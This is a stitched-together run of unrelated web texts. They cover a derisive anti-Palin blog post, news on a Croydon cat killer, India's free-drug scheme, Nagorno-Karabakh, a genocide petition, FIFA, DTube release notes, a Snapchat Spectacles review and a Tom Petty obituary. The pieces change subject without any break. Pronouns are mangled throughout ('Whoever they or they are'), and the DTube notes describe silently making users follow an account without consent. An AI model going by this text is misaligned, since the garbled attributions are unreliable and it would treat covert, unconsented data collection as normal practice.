Further below the surface is a statement of what exactly about life should be valued. Certainly not intellectual pursuits, taking a broad interest in the world through travel, or exploring our or any other culture. Palin, like Bush before, has made it to middle age without ever needing a passport. The life that is to be valued so highly is one of breeding, church, TV (provided most channels are locked) and a glass of water on the side for dippin.' Another couple might choose to work for a child with the capacity to value art or science, rather than deliberately developing a child who will never move past watching “Dora The Explorer” and eating seven-course dinners consisting only of a series of Happy Meals with a different toy in each box. Such a couple (never mind a single woman) is the enemy. They must be denied that choice because their assessment of what makes life valuable is against God, who tells us that anyone who fears them is better than anyone who doesn't. The value of human life ends at the limitations of a downy.
Those who value something more are to be supplanted at the top (superficially) and stifled at the bottom. Anything approaching intelligent discourse is to be discredited as liberal-biased elitism. The promise is a parody of socialism, in which nobody is allowed to think more deeply or know more than the stupid-conservative base. It is, of course, as empty a promise as the one to overturn Roe v. Wade, or to fight the cheap labor coming in illegally from Mexico. The elites will send their children to prep-school, rather than Jesus camp, as always. The stupid people, however, are being offered their biggest ever box of toys in the world of politics. I don't think it will work this time around, but the fact that the presidential race is even close, given the state of the country, proves it to be a winning strategy. My only hope for the future is that the Green Party will recruit Trig Palin.
Share this: Facebook
Google
Twitter
More
Tumblr
LinkedIn
Reddit
Pinterest
The so-called “cat ripper of Croydon” is, in truth, no laughing matter. Whoever they or they are, they must know the suffering they are inflicting, not only on the unfortunate cats but also their owners. One can only assume that this strange individual gains some sadistic pleasure from their activities.
The “cat ripper of Croydon” label is also more than a little offensive, summoning up images of Jack the Ripper. While the Whitechapel murders of 1888 have been parodied and long since passed into folklore, they were what we would now call serious sexual crimes against women.
Like the original Jack the Ripper, there is a degree of unhealthy public fascination with this disturbed individual, though perhaps this time round there will not be any suggestion that the perpetrator is related to the Prince of Wales or assisted by the Queen's Surgeon.
Join Independent Minds For exclusive articles, events and an advertising-free read for just £5.99 €6.99 $9.99 a month Get the best of The Independent With an Independent Minds subscription for just £5.99 €6.99 $9.99 a month Get the best of The Independent Without the ads – for just £5.99 €6.99 $9.99 a month
The killer is careful. None of the cats has any human DNA beneath its claws, which might lead to identification of its slayer. If they or they are ever apprehended then the authorities will have to face the question of what would be an appropriate punishment.
For many animal lovers – fittingly in view of their habit of decapitating their victims – the guillotine or hanging would be too good.
The existing penalties for animal cruelty or criminal damage seem inadequate to the task though, and demonstrate what a poor deterrent they represent to those as mentally unsound as this. A curious and disturbing story, at any rate.
We'll tell you what's true. You can form your own view.
At The Independent, no one tells us what to write. That's why, in an era of political lies and Brexit bias, more readers are turning to an independent source. Subscribe from just 15p a day for extra exclusives, events and ebooks – all with no ads.
Subscribe now
It was in 2012 that the Centre first promised to provide free drugs in public health facilities. The first budgetary provision was made in 2013. Last year, the promise was crystallized to providing 348 essential drugs free. This was later whittled down to just 50 drugs. And now, the entire idea of a central scheme for free drug distribution has been given a quiet burial.Joint secretary (policy) in the health ministry Manoj Jhalani confirmed that there will be no separate central scheme for free drugs and diagnostics anymore . “Free drug provision will be done by the states under the National Health Mission (NHM). The Centre will financially incentivize states to start the free drug scheme. If a state initiates a free drug schemes and fulfils the condition of putting in place a quality assurance system, prescription audits and so on, it will be given 5% of its NHM allocation as incentive. A large number of states have agreed to this,” said Jhalani.In their budget speech last year, finance minister Arun Jaitley stated: “To move towards ‘Health for All', the two key initiatives i.e. the Free Drug Service and Free Diagnosis Service would be taken up on priority.” However, there was no provision in the budget. In their budget speech this year, the words medicine, drugs and diagnostics do not figure anywhere.In September last year the health ministry had brought out a document titled Free Essential Drugs Scheme- Base paper for Discussion. It said: “Government intervention for better access to essential medicines is urgently required as expenditure on drugs constitutes about 67% of out of pocket expenditure on health care and out of pocket expenditure is one of the leading causes of impoverishment.” The document also stated that free provision of essential drugs to all patients accessing public health facilities, while not costing so much to the government, brings huge savings to the patients, and is the easiest and quickest option to improve access to essential medicines and reducing out-of-pocket expenses. Harsh Vardhan had stated that the free medicines scheme would go a long way toward fulfilling the promise of reducing out-of-pocket expenditure on healthcare.Reacting to the central free drug scheme being scrapped Dr T Sundararaman, visiting professor at the Centre for Social Medicine and Community Health in JNU and former director of government's National Health System Resource Centre said: “It is a complete withdrawal of the state in a major way from public health. There is a reason why the health sector industry has shown the highest growth in sensex. The state withdrawal is a predatory opportunity for the private sector.” Jan Swasthya Abhiyan's co-convenor Dr Amit Sengupta said that it was unfortunate that what started off as central scheme was being pushed onto the states so that the centre could absolve itself of all responsibility. “Rajasthan has shown how free drug scheme increased the usage of public health facilities. Given such obvious benefits, why is the central government not committing to this level of spending? The only plausible explanation is that this is in conflict with the government's idea of promoting the private sector.”In June last year the government had claimed that the free drugs programme was a part of the National Health Assurance Mission which would also include free diagnostics and free health services. The health ministry had sought Rs 500 crore budgetary support for the scheme. Under the programme, 348 drugs in the National List of Essential Medicines (NLEM) were to be provided free from 1.6 lakh sub-centres, 23,000 primary health centres, 5,000 community health centres and 640 district hospitals.In 2011, the Planning Commission had estimated that the free drugs scheme would cost the centre about Rs 28,675 crore over the period of the 12th five year plan (2012-17). The centre was supposed to bear 85% of the cost and the states were to contribute the remaining 15%.
* Fighting erupted in 1991, ceasefire brokered in 1994
* Region criss-crossed by energy pipelines
* War could draw in regional powers - think-tank
By Margarita Antidze
TBILISI, June 1 (Reuters) - The former Soviet republics of Armenia and Azerbaijan are closer to war over the breakaway Nagorno-Karabakh region than at any point since a ceasefire brokered more than 20 years ago, the International Crisis Group said.
Fighting between ethnic Azeris and Armenians first erupted in 1991 and a ceasefire was agreed in 1994. But Azerbaijan and Armenia have regularly traded accusations of violence around Nagorno-Karabakh and along the Azeri-Armenian border.
Clashes over control of Nagorno-Karabakh, which lies inside Azerbaijan but is controlled by ethnic Armenians, have intensified in the past three years and turned into a violent flare-up of the conflict last April, when the International Crisis Group (ICG) said at least 200 people were killed.
It said any descent into all-out war could draw in regional powers, which include Russia and Turkey - closely allied to Armenia and Azerbaijan respectively.
Since mid-January this year, deadly incidents involving the use of heavy artillery and anti-tank weapons have occurred and May saw a significant increase, including reports of self-guided rockets and missiles used near densely populated areas along the contact line.
Efforts to secure a permanent settlement of the conflict in the South Caucasus, which is criss-crossed by oil and gas pipelines, have failed despite mediation led by France, Russia and the United States, known as the OSCE Minsk Group.
“A year after Nagorno-Karabakh's April 2016 violent flare-up, Armenia and Azerbaijan are closer to war than at any point since the 1994 ceasefire,” the ICG said in a report titled “Nagorno-Karabakh's gathering war clouds”.
“While violence remains at a relatively low boil, any escalation quickly could spin out of control,” the think-tank, which works to prevent conflict, said.
The ICG, which based its report on the findings of analysts who had talked to residents and observers on the ground, said the settlement process had stalled, making the use of force tempting, at least for tactical purposes, and both sides appeared ready for confrontation.
“These tensions could develop into larger-scale conflict, leading to significant civilian casualties and possibly prompting the main regional powers to intervene,” the ICG said.
The ICG said that Russia remains the most influential foreign player, yet its role is complex.
“It is prima inter pares in the Minsk Group, but also chief arms supplier to Azerbaijan and Armenia, both of whom suspect Russia is more interested in expanding its influence in the region than in resolving the conflict,” the group said.
The Minsk Group is part of the efforts by the OSCE European security watchdog to find a solution to the conflict.
According to the report, Armenia – concerned about Nagorno-Karabakh's security and angered by Baku's increased assertiveness – insists on a lowering of security risks before substantive talks can start.
It said Azerbaijan – frustrated with the longstanding status quo and concerned that additional security measures could further cement it – insists substantive discussions cannot be delayed.
Government officials in Armenia and Azerbaijan had no immediate comments on the report. (Editing by Alison Williams)
Friday night on “Real Time with Bill Maher,” host Bill Maher addressed the Republican Party's staggering electoral losses in this week's elections and mused that the party may be facing virtual extinction.
Maher began the segment talking about Fox News's alert early on election day that a single “New Black Panther” was reported to be looming ominously at a Philadelphia polling location.
“I would never try to convince Fox News that black people aren't scary,” Maher said, “but if last election, you found a total of two New Black Panthers ‘suppressing the vote' by hanging around a voting booth and this year they only had one guy? The thing being suppressed is laughter.”
“I'm sorry New Black Panthers,” they continued, “but if your entire movement gets to a restaurant and the hostess looks at you and says they can't seat you until your whole party arrives…?”
“I bring this up because the background story in this election has been ‘white people losing their power,' I mean, let's be honest. Republicans have the same problem as the Beach Boys. Their fans are dying.”
Watch the video, embedded via Mediaite, below:
Reuters Christians abandon their homes in Iraq to escape violence from Islamic State militants.
A petition with more than 400,000 signatures from citizens all over the world was recently submitted at the U.N. headquarters in New York calling on the Security Council to formally declare the persecution of Christians and other minorities in Syria and Iraq as genocide.
Religious leaders like Nigerian Bishop Joseph Danlami Bagobiri and Archbishop Jean-Clement Jeanbart of Aleppo, Syria joined representatives of the advocacy group CitizenGO outside the U.N. in New York last week to press the Security Council to "take a step forward to protect Christians and other religious minorities that live there" in order for religious freedom to prevail in that part of the world.
"So we are here to support our brothers and sisters, Christians and other believers that are suffering persecution, that are suffering killings, that are suffering discrimination in this part of the world, the Middle East," said Ignacio Arsuaga, president of CitizenGO, the Catholic News Agency (CNA) reports.
According to him, the petition that was submitted to the office of U.N. Secretary-General Ban Ki-moon specifically asked the U.N. chief to pressure the council to declare genocide for Christians and other religious victims of the Islamic State (ISIS) and "to enforce mechanisms to protect genocide victims and prosecute the persecutors."
It likewise called on member nations to act "to stop the war in Syria" as well as help internally-displaced persons in Iraq and Syria return to their homes.
The petition also proposed that "safe havens" for internally displaced persons should be created, as well as an "action plan to rescue kidnapped and enslaved Christian and Yazidi women and girls."
Christians make up 80 percent of minority victims of religious persecution. They have left Iraq and Syria in droves since the civil war erupted in the Middle East, the Call to Action group says.
The petition stated: "Christians, Yazidis, and other minorities are victims of the deliberate infliction of life conditions that are calculated to bring about their physical destruction by the so-called 'ISIS': They are being murdered, beheaded, crucified, beaten, extorted, abducted, and tortured."
"Women and children have also been enslaved, women have been raped and trafficked, children have been forcibly recruited, and churches and communities have been destroyed," the report says.
In Nigeria, Christians have been targeted by the terror group Boko Haram. Over 4,000 have been killed and almost 200 churches have been damaged or destroyed since 2015, according to the group Open Doors.
Archbishop Jeanbart told CNA that it is so important for the U.N. to take action on the issue because the church of the first Christian is already collapsing.
"We are undergoing a real genocide," they said of their diocese in Aleppo, "and we are afraid that they want to take us out of our life, but also of our country, of the place where we were born, where the Church was born."
"There are two kinds of genocide, human genocide and Church genocide. Not only are people dying, but the Church itself is "disappearing" from Syria, they said.
According to the archbishop, the first Syrian Christians were Jews from the Diaspora who had made the pilgrimage to Jerusalem at the time of the Pentecost and were among the 3,000 baptised by Peter and the Apostles.
The U.S. State Department, the British House of Commons, and the European Union Parliament have already declared that genocide is taking place in Iraq and Syria. Multiple U.N. advisory bodies have likewise stated that genocide is taking place in Syria and Iraq, CNA reports.
Political Magic the Gathering Cards Posted by wizeGurl (28035 views) [E-Mail link] [ BSAlert *exclusive* ]
[ Media ] Perhaps you're familiar with the phenomenon of Magic the Gathering cards, and the associated game. Or maybe you're not. But either way, you might be interested in some new, more modern versions, that can be integrated into your gameplay for a whole new kind of experience.
This particular set of cards was designed exclusively for BSalert. Check out the various series below for a new perspective on the games of politics and media!
First, a few cards for political figures and issues:
Next, a few cards representing media & entertainment:
A few choice selections from the "fallacies and reasoning" series:
To make your own cards, you can download this software and go nuts!
creature-beast
Posted by kranioceros on 2010-03-05 05:54:05 if you have all the creature-beast magic card you win the game mustang
Posted by tim fghs on 2010-05-07 18:24:47 tarjkffffffffffffffffffadadadadadadadg Posted by Anonymous on 2010-06-05 03:03:16 nice job. looks like you put a lot of work into these. Too bad most of the abilities make them pure jokes. You could easily modify these to be playable, then print them out. If you use sleeves you can put them in front of regular cards and draft them, though you would need more cards than this to have a real game. Posted by Anonymous on 2012-03-23 18:42:33 Figures. You hate religious people. Name: (change name for anonymous posting) Title: Comments: 1 Article displayed.
Read this article and see if something sticks out so quickly to you around the concept of the headline: “The only commonality is that basically all the victims were Jewish.”
New York (Crown Heights) – Police have arrested four children in connection with a string of alleged “knockout game” attacks in Brooklyn, the NYPD said.
A 14-year-old girl and three other children, aged 10 and 11, were arrested in connection with three assaults that took place between October and November.
The victims included an 11-year-old boy who was punched on President Street, a youth who was hit with a rock while walking home from school and a youngster who was “mushed” in the face with a plastic bag, said Deputy Inspector George Fitzgibbon, the 71st Precinct's new commanding officer.
“Kids are kids — when you're talking 10 and 11 year olds getting involved in these type of things, sometimes they don't realize the magnitude of what they're doing,” Fitzgibbon said.
While the NYPD's Hate Crimes Task Force worked on the investigation as well, police determined that the attacks were not motivated by bias.
“Every time one of these incidents did occur, nothing was ever said with regard to any kind of bias, so to speak,” Fitzgibbon said of the three attacks, which occurred in October and November.
“The only commonality is that basically all the victims were Jewish.” (link)
Really? That's the only commonality – really? REALLY ?
Well, I guess when you choose to filter the “race” of the perpetrators, you're clear to say the only commonality are the components of the victim. See what they do there.
Advertisements
The Fourth Circuit threw out the Commonwealth of Virginia's suit challenging the constitutionality ObamaCare's individual mandate, but it appears to have done so with a basic error in the facts of the case. Governor Bob McDonnell signed the Virginia law on which the suit is based days before ObamaCare went into effect, not afterward as the Fourth Circuit had it.
Redstaters will know this suit as the Ken Cuccinelli one.
James Lakely of the Heartland Institute said (emphasis added):
The Court said Virginia couldn't nullify Obamacare because its law doing so was signed by the governor after the president signed their health care bill. Trouble is, Gov. Bob McDonnell signed their bill days before Obama signed his. It was only McDonnell's public signing ceremony that came afterward.
Maureen Martin, senior fellow for legal affairs at Heartland wrote in the Heartlander that a Fourth Circuit panel “made a ‘rookie' factual error serious enough to call for invalidation of its entire decision”.
Virginia had enacted a state statute — the Virginia Health Care Freedom Act (VHCFA) — declaring the individual mandate contained in the Obamacare bill did not apply to its citizens. Virginia then filed a lawsuit alleging the individual mandate violates the Commerce Clause of the United States because the federal government lacks the constitutional power to require individual citizens to purchase health insurance or pay a penalty.
But the Appeals Court held last week that Virginia lacked standing, because (as the court erroneously thought) having signed the state law after ObamaCare went into effect meant the state statute was a mere a political attack on it.
Read the rest at Heartland.org.
Follow @lheal on Twitter.
Qatar's Emir Sheikh Hamad bin Khalifa al Thani celebrates their country winning the right to host the 2022 World Cup (Arnd Wiegmann/Reuters)
COCA-COLA has become the first big World Cup sponsor to attack Fifa over the “disappointing” handling of its botched corruption investigation.
The soft drinks brand, whose financial backing is worth more than £300m to world football's embattled governing body, broke ranks this weekend to voice its concern. It called for transparency amid the deepening crisis over the organisation's attempts to whitewash a report on corruption in the bidding for the 2018 and 2022 World Cups.
The chief executive of the German football league, Christian Seifert, called for a Europe-wide boycott of both World Cups. “As a serious organisation, we no longer feel represented by this Fifa,” they said.
Fifa was plunged into crisis 10 days ago when it published a short summary of the report,…
Things are starting to settle down here for the DTube project. Many of the networking issues seem to be resolved with the automatic gateway system and viewing videos seems to be comfortable as long as the video bitrate is lower than the connection max speed. Issues are clear now, some are easy to fix, some are harder, but overall the minimum viable product seems to be viable. I believe it's now about time to introduce some features that will improve the user-experience this time around in 0.3.
DTube is now multi-language
Click here to see what DTube looks like in Korean!
I've been regularly browsing DTube, and it's clear that the huge majority of the content is in English. While the USA discovered the Internet before any other nation and got a culture boost out of that, that doesn't fully explain the super low number of videos in other languages. SteemIt has a lot of Korean or German content and I don't want to leave some countries/languages out of the loop for the development version of DTube.
DTube will detect your favorite language from your browser settings, and if the translation exists, it will download it and update all the texts in the UI. In order not to increase the app size, these translations are currently stored inside the STEEM blockchain (example). STEEM is amazing for translations, as SteemIt/ChainBB can be used as a UI to correct mistakes or add new translations.
Maybe hosting these translations on IPFS would be faster to load in most cases, but in the design of DTube I would rather use the blockchain for text, and only IPFS for 'bigger files'.
At the moment that I am launching 0.3, only seven languages are available:
English (en-us)
French (fr-fr) - translated by @heimindanger (n'hesitez pas à me dire si il y a des corrections à faire)
Korean (ko-kr) - translated by @steemitjp
Portuguese (pt) - translated by @prc, the developer of DSound
Lithuanian (lt) - translated by @nannal, the owner of IPFS Store
Turkish (tr) - translated by @steeminator3000
Polish (pl) - translated by @dailydogger
Translate DTube for your language
Of course, seven languages are not enough. YouTube has too many to count. I also want all of the commonly spoken languages on Earth to be available on DTube. Doing this for most projects would be impossible, or take a lot of efforts to find competent translators. Luckily, STEEM is a social network that incentivizes cooperation instead of competition, and DTube has the support of the STEEM community. That's why I am adding a call for translators in this article. If you are not interested in helping, or you don't speak any non-translated language, feel free to skip this part of the article and go straight to the next new feature.
Before reading further, please understand that DTube is a work in progress and will be for a while. This means that there will be updates and probably some new lines added to the translation file regularly. You will be invited in the DTube private discord and we will notify you a few days before any new version so you have time to update your translation. This should happen about once every two weeks for at least a couple of months.
The English translation file for DTube 0.3 is available here. This will be your starting point to translate to your language. At the moment it's pretty short (87 lines in total), and should probably take less than an hour to translate. Save it to your disk and start editing the values (on the right), and leave the keys (capitalized stuff on the left) untouched. Some values contain some '%1', '%2', etc that represent some variables that will be replaced by the app. For example:
"GLOBAL_ERROR_VOTE_FOR":"%1 vote for %2"
This is the line for the text displayed when you upvote. In English it would display '100% upvote for dollarvigilante'. Some languages will require you to move these variables in other parts of the sentences sometimes. For example in French it becomes:
"GLOBAL_ERROR_VOTE_FOR":"Voté à %1 pour %2"
Once you have fully translated into a new language, feel free to contact me either through comments on this article, or on steemit.chat if my comments are spammed like past two articles and you want a quick reply.
Subscribe / Unsubscribe Button
The single most requested feature since launch was this one. The way you were able to browse DTube was very limited before this feature. All you could do was check new/hot/trending videos on the homepage. Even if you liked someone content, you wouldn't be able to see it through DTube if it didn't go to hot or trending unless you bookmarked the channel page and check it often.
As usual, I copied the way YouTube displays it in the UI. The button comes in with a counter showing the total follow count. YouTube shortens the count for big numbers such as '2M' or '42K' but I didn't feel like doing that as the maximum number of followers is still in the 5 digits range for STEEM.
I originally thought I would not to re-use the SteemIt follower counts, and make everyone restart at a 0 follower count on DTube. Unfortunatly that is not possible with the current state of the STEEM follow API, despite what the design of it suggests. So instead, your DTube list of followers is the same one for both SteemIt and DTube... I looked for a while at the code of the follow API, and I believe the required changes to make this possible are small. It's not because I follow someone on instagram that I want to subscribe to their YouTube automatically, I want to have the choice.
Feed
The subscribe button would be useless without this, so it comes in the same patch. This is more similar to SteemIt than YouTube in the way it's displayed on the screen.
It should take a bit longer to load than other categories because of STEEM limitations. The get_discussions_by_feed method of the STEEM blockchain does not behave like other get_discussions_by_* methods. I believe that if we could also filter the feed by tags, it would benefit applications which have a different type of content than steemit a lot.
The Trending/Hot/New categories on the homepage filter by tags. This is reliable because the number of people using the 'dtube' tag through steemit directly is negligible compared to the many DTubers who automatically have the 'dtube' tag.
The feed doesn't have this luxury option sadly, so instead it fetches the maximum amount (100) and filters out all of the non-videos. So if your feed only displays a few videos, this is likely the reason.
I really dislike the way the follow / feed works right now on STEEM. It requires me to make more calls through SteemJS and waste a lot of data. Little features like that is what apps that have different content types (think steepshot, dtube, dsound) need.
Follow us on @dtube
I sneaked in a 'dark' feature in DTube, but at least I decided to make it clear in this article. I'm trying it out mostly as an experiment. I predict that I will either look like an asshole for attempting it, or other applications will start doing the same thing soon. It all depends on your reactions in the comments.
Basically, whenever you log in on DTube, the app will automatically make you follow the @dtube account. There are no warnings or confirmations requested, and it won't even tell users what just happened in the background.
This will help me analyze a bit better the userbase of DTube. Because of the decentralized nature of DTube, we cannot use Google Analytics or automatic bug-reporting tools as we have no idea what it's really doing and might be leaking your keys somehow. So at least this way, I will have some data. I will be able to know how many people use DTube, and when these users first started using DTube.
Of course, I won't be shit-posting or resteeming my friends with the account. Anything posted/resteemed by this account will always be content that I believe can help DTube users, and most likely will be in video format.
Using Busy.org for images
Many people have noticed it, but avatar pictures were not displayed correctly on DTube in some cases. They would show as a missing picture or not display as a square as they should. This should now work properly, as we are using img.busy.org as the provider for all these pictures. Busy will automatically compress, crop and resize pictures, so that I don't need to worry about it! Same thing will probably be used for the cover pictures once we start working on the channel page.
Claim your rewards
Not a huge feature, but you can now claim your rewards directly on DTube. Inside the user menu, you will see a 'Claim Rewards' item that will tell you how much you will claim if you hover the button. While not a super-priority feature, this was quite easy and possible as it only requires the posting key. And it's clearly the most 'feel-good' transaction we can make on the STEEM blockchain.
I will use this paragraph to make a short aparté. I have no idea why these rewards can't be added on our wallet balances automatically like they were in the past. I can see how claiming rewards might be a good thing to avoid dead accounts making money, but there is already a 7 days maximum payment window for all contents on the blockchain, so an account has to have been active 7 days ago to receive a reward. If someone could enlighten me on the need of this feature on the STEEM chain, I would be grateful.
DTube Embed (concept)
Embed Demo: https://skzap.github.io/embedtube/#!/curator/m70sk5cv
I talked in the original release post about how I believe having a custom video player is a necessary feature. I quickly realised from people's reactions that they had no idea that DTube had 0 work done on the player, as the native video players in modern browsers seems to be working good. Still, I believe having a custom player comes in handy, especially for the case of the embed where I want to add some branding, a small DTube logo that leads to DTube, just how YouTube does it in their embed.
So I searched around, and ended up playing around with VideoJS, a Javascript library for displaying videos. It's pretty solid and extendable but will require some work on the design side. I'm not adding a button like YouTube to get the embed code from the video, but I might soon.
So let's say you want to include the concept DTube embed on your site, you would need to copy and paste this code:
<iframe width="560" height="315" src="https://skzap.github.io/embedtube/#!/curator/m70sk5cv" frameborder="0" allowfullscreen></iframe>
If you want to do it for other videos, just replace the end of the src url by the correct one for your video.
New DTube contributors
I mentioned in my previous article that I was interviewing people to help me on DTube. Well in the end, all this process was completely useless. I ended up recruiting a past colleague of mine to be the second developer: @superkoala. They have very little experience with blockchains but is a seriously good developer with good practices. We already worked together in the past without issues, and I know I'm kinda hard to work with because of my sub-par communication skills. They already started working on DTube and did 90% of the multi-language feature for this patch, which allowed me to take some time off without thinking I'm a slacker >:-)
I also recruited @hightouch, yet another French developer to work on the UI. They started playing around with the codebase and seems to be a good fit for the job. Their first tasks will be to improve the user-experience by a lot, such as removing the stupid scrollbars on the homepage, and making the categories load more videos as you scroll to the right, just how steemit does it when you scroll to the bottom. They will probably be the one working on the channel page design as well.
Also I have regularly been giving tasks my turkish friend @steeminator3000 to do some boring things such as helping users in the #dtube steemit.chat channel, or doing some google researches for me. Consider them the 'jack of all trades' of the team.
Optimizations
Application Startup
DTube 0.2 added a convenience feature for me that allows me to change the settings of DTube from the blockchain directly. While convenient, it also added a good 1-2 seconds to the app loading time. In 0.3, after loading the translations, and the list of people you follow, I realized the application startup process was taking too long. No one wants to wait 5 seconds to start seeing a video, right?
Well I moved some stuff around in the code, and remote settings, translations and followers lists will now load after the application is rendered on the screen, and update on the screen when it's loaded. This is why you will probably see DTube in English before your localized translation loads from the chain.
Limiting the size of contents
I only recently discovered the truncate_body argument. This allows DTube not to load the useless part of the contents that DTube doesn't use. Such as the body , which is the markdown/html code of your normal steemit articles. This field contains A LOT of data size-wise, and getting rid of it should help to load speeds.
Upload Errors
I receive many feedbacks about errors during the upload. We were not using standard ports for uploads, and that caused a lot of people using university networks or public wifis to be unable to upload. This should be fixed as we should be using port 443 everywhere for the upload now.
There are also some timeout errors happening for uploads longer than 15 minutes. We are still unsure how to solve that on the IPFS node side. The upload page is probably the most critical one on DTube, and I really feel bad when I hear users having issues about it. No doubt some improvements will come quickly as I put my brain back on it.
Last words
A pretty solid update overall, despite some disapointments because of some STEEM limitations. I think I will try to setup a node and suggest code changes to the follow api, because the current state is clearly not at the same level as the rest of the STEEM blockchain.
The patch also took a bit longer than expected because of the time to interview and recruit developers, get them set up with the project, and cleaning up the code a bit to make it extra-easy to understand for them. Next updates should come in faster I hope.
It's already been more than a month since DTube's launch, and we are already seeing more developers converting to the IPFS+STEEM combo. For those who missed it, @prc released DSound recently and built it all faster than I built DTube originally. This reinforces my belief that doing what I did is not too hard and that many more DApps on top of STEEM will happen in the future.
Derek Savage Books , Derek Savage Productions , Cool Cat , Cool Cat Kids Superhero , Cool Cat Saves the Kids , Cool Cat Productions, Cool Cat Movie, Kids Gun Safety , Anti-Bullying , Bullying , Cool Cat Loves You , Gun Self Defense for Ladies , Gun Safety , Bible Birdie , Trolly the Trout , Blue Thunder Books
---- Welcome to Derek Savage Productions ----
Novels and Screenplays
Sweet Revenge Final Conflict Bad Boy a Screenplay a Novel and Screenplay a Novel and Screenplay
Movies and Documentary Films
Children's Books by Derek Savage
Cool Cat Loves
the Beach Cool Cat Loves
Wrestling Cool Cat Loves
Baseball Cool Cat Loves
the Soldiers Cool Cat Stops
Bullying
TROLLY
MAKES
FRIENDS TROLLY
FINDS A
GUN TROLLY
AND THE
NECKLACE BEST BUDDIES BABY CAT
LOVES
YOU
BIBLE BIRDIE a Christian Themed
Children's Chapter Book Book and Audio Book
--- Cool Cat ® Clothes ---
Get Your Cool Cat T-Shirts Today!
Only $19.99 each, All Sizes Same Price!
It's the Same 'Style Shirt' that Cool Cat wears in their Movie!
Follow Cool Cat at @CoolCatLovesYou
*** Cool Cat Loves You ***
Derek Savage
The Savage Site has won the prestige Website Awards
Getting my hands on a pair of Snapchat Spectacles felt like getting a golden ticket.
Only instead of Willy Wonka greeting me at the "chocolate factory" (Venice Beach), there was just a bright yellow vending machine. And a line of hundreds of people also waiting to get the specs.
"That's incredible," one person said, admiring the "Snapbot" from afar.
When I finally got them — thanks to a friend at the front of the line who got one for me — I realized why everyone is so excited.
Not only are the glasses a cool tech gadget, they actually look cool when you're wearing them.
First look
At first, I was skeptical. The packaging made it seem like I was opening a box of tennis balls. It was also 80 degrees outside and I was already sweating from standing around watching the spectacle over Spectacles. Finally, the glasses cost $130 — a big price tag for something that hasn't been widely tested yet.
The glasses come in three colors: Black, teal and coral. I chose the classic black ones, and was pleasantly surprised by how much they looked like regular sunglasses (minus the circular yellow cameras on each side of the frame).
The glasses themselves come inside a bulky case, but there's actually a reason for that: The case also serves as a charger. It comes with a charging cord to charge the case itself. Oh, and a cleaning cloth. The case can apparently recharge Spectacles about four times, and each charge will get you about 400 snaps. If it seems weird to have to charge your sunglasses, that's because it is. Weird but practical.
The first task — connecting the device to your phone — is easy. A few days ago, Snapchat pushed out an app update available to users which make the process easier. All you have to do is hit "pair spectacles" within the app while wearing the glasses. You then push the button above your eye, and the two connect in just a short amount of time.
Unlike the case that charges them, the sunglasses themselves aren't heavy. They are well-fitted specs, designed specifically for snapping on the go.
After setting up comes the fun part: Snapping. In line, it seemed this was the clear draw of the product because Snapchat is a platform that many uses every day for fun, for exchanging pictures, video and text. People also wear sunglasses on a regular basis. Combine the two and you have a device that can shape the future of content creation and communication.
"It's a cool new way to capture the world," Kate Edwards, from Venice, California., said while waiting in line. "I think what Snapchat is doing with this device is really interesting."
"It's a cool new way to capture the world"
Like many in line, Edwards works in tech. As an avid Snapchat user, they said they were eager to get the tech world's latest offering.
Spy vibes
Snapping with sunglasses is a little confusing at first, but it gets easier after some time wearing them. They give you a step-by-step guide, which is very simple.
You just have to press on the button above the camera and on the side of the glasses to take a 10-second video Snap.
The moment you do, a white LED inside the frame lights up, signaling that recording has begun. There's also an outer LED ring, which illuminates so your friends know you are recording.
If you press once on specs' button, you can extend your Snap to 20 seconds, and you can press again to extend to 30 seconds.
It automatically transfers from the glasses to the app via Bluetooth once you Snap, but takes a minute or two to appear on the app itself.
The videos are then available in your "all" tab in memories, but also shows up in a new "specs" tab. If you took three 10-second recordings, they will be broken up into three ten-second Snaps.
Even though there are lights to show you are recording, I still felt like a spy when wearing the glasses.
It's like the gadget that you'd expect 007 to bust out when they want to record someone to take them down (he probably wouldn't put the footage on Snapchat, though).
On one hand, feeling like a spy is the coolest thing ever. On the other hand, it feels a bit invasive — like I felt I could secretly film something and no one would know unless they were paying close attention.
Image: luke beshar/mashable
But as far as the videos themselves: They are very high quality, and now can come in a circular video format, recorded through a 115-degree-angle lens.
The circular views remind me of a fisheye lens in that they kind of make the video seem more hipster. Other than that, it looks like just another one of your videos in your memories tab.
Will it be a hit?
The device is not a fashion statement (though it looks normal on), nor is it really a gadget.
Instead, it kind of feels like an extension of Snapchat culture, as evidenced by the hundreds showing up as early as 6:15 a.m. to be among the first to obtain the sunglasses.
It was most interesting to see the juxtaposition of these eager consumers — mostly from the tech, marketing and PR industries — next to the artists, surfers and other eclectic people that make up the DNA of Venice Beach.
One man, a vendor at a T-shirt store on the boardwalk, asked a person in line "What's this for?" The consumer had to explain first the Sunglasses, then Snapchat itself.
Still, it's doubtful such ignorance really matters. Snapchat's curiously enhanced sunglasses will certainly become a popular must-have among the tech-savvy — and perhaps many of the teens and millennials who use Snapchat the most — and I don't know how else you'd define their success.
If that happens, it'll be because Snap learned one of the key lessons from the fall of Google Glass: Spectacles look and feel (almost) like regular sunglasses. They're remarkable by being precisely unremarkable, a subtle message of cool to most, but a signal of out-of-this-world exclusivity to the Snapchat crowd. Put simply: The kids are gonna love 'em.
Tom Petty: The Last Great American Rock Icon
Tom Petty and the Heartbreakers recently completed a summer tour with three nights at the Hollywood Bowl. The trek marked the band's 40th anniversary. I was chatting with a coworker about Tom Petty the morning they were found unconscious at their home.
During a conversation that now feels eerily foretelling, I mentioned Tom Petty as my bucket list concert; the only musician I just had to see live before they died. Little did I know at the time that Petty would go into full cardiac arrest at some point that morning.
Later in the day, after much confusion and retracted news reports, a statement was issued by their manager, Tony Dimitriades. “We are devastated to announce the untimely death of our father, husband, brother, leader and friend Tom Petty,” Dimitriades said on behalf of the family.
News of Petty's condition and their death may have been unclear and confusing, but their reputation and legacy suffered no such problem. Tom Petty was one of the greatest rock musicians and possibly the last link to the early days of rock and roll.
ANYTHING THAT'S ROCK ‘N' ROLL
With their nasally voice and chiming guitar, Petty and their longtime band, the Heartbreakers, churned out an instantly recognizable brand of sturdy, American rock that made them a classic-radio staple for decades.
Petty was born October 20, 1950, in Gainesville, Florida, the first of two sons of Kitty (Avery) and Earl Petty. Their interest in rock and roll music began at age ten when they met Elvis Presley, and they began working on music after seeing the Beatles on The Ed Sullivan Show in February 1964.
After numerous failed starts, Petty, along with original Mudcrutch members, Mike Campbell and Benmont Tench joined Ron Blair and Stan Lynch to form the first lineup of the Heartbreakers. Their eponymous debut album was released in 1976 to minimal fanfare.
